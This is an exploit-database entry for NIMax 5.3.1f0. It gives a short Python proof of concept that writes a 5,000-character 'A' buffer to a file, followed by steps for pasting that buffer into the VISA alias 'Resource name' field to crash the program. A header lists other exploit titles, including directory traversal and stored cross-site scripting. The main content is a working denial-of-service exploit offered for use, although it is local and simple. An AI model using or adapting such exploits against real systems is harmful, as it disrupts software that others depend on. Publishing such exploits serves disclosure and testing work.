
5 changes to exploits/shellcodes NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
31 lines
No EOL
982 B
Python
Executable file
31 lines
No EOL
982 B
Python
Executable file
# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)
|
|
# Date: 24/06/2021
|
|
# Exploit Author: LinxzSec
|
|
# Vulnerability: Local Denial of Service (DoS)
|
|
# Vendor Homepage: https://www.ni.com/en-gb.html
|
|
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
|
|
# Tested Version: 5.3.1f0
|
|
# Tested On: Windows 10 Pro x64
|
|
|
|
'''[ POC ]
|
|
1 - Copy printed "AAAAA..." string from "nimax.txt"
|
|
2 - Open NIMax.exe
|
|
3 - Drop down "My System" then drop down "Software"
|
|
5 - Locate "NI-VISA 5.2" and select it
|
|
6 - Open the "VISA Options" tab
|
|
7 - Drop down "General settings"
|
|
8 - Select "Aliases"
|
|
9 - Select "Add alias"
|
|
10 - Paste string from "nimax.txt" into "Resource name"
|
|
11 - Just put a single character in the alias and press "ok", DoS will occur
|
|
'''
|
|
|
|
buffer = "\x41" * 5000
|
|
|
|
try:
|
|
f = open("nimax.txt", "w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print("[+] File created!")
|
|
except:
|
|
print("[+] File could not be created!") |